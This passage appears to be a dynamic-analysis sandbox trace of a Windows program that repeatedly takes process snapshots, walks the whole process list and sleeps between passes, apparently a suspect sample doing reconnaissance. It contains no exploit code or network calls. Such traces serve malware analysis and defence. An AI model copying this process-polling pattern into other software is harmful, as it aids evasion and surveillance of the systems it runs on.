cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0135.705] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0135.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0135.708] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0135.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0135.710] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0135.711] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0135.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.714] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0135.715] CloseHandle (hObject=0xc4) returned 1 [0135.715] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0135.720] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0135.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0135.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0135.724] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0135.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0135.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0135.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0135.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0135.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.732] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0135.734] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.735] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.736] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0135.737] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0135.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0135.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0135.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0135.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0135.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0135.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0135.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0135.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0135.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0135.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0135.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0135.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0135.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0135.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0135.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0135.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0135.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0135.786] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0135.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0135.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0135.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0135.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0135.793] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0135.795] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0135.796] CloseHandle (hObject=0xbc) returned 1 [0135.796] Sleep (dwMilliseconds=0x12c) [0136.514] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0136.519] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0136.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0136.521] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.522] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0136.523] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.523] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0136.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0136.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0136.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0136.527] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.533] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2b, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.536] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0136.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0136.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0136.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0136.544] Process32NextW 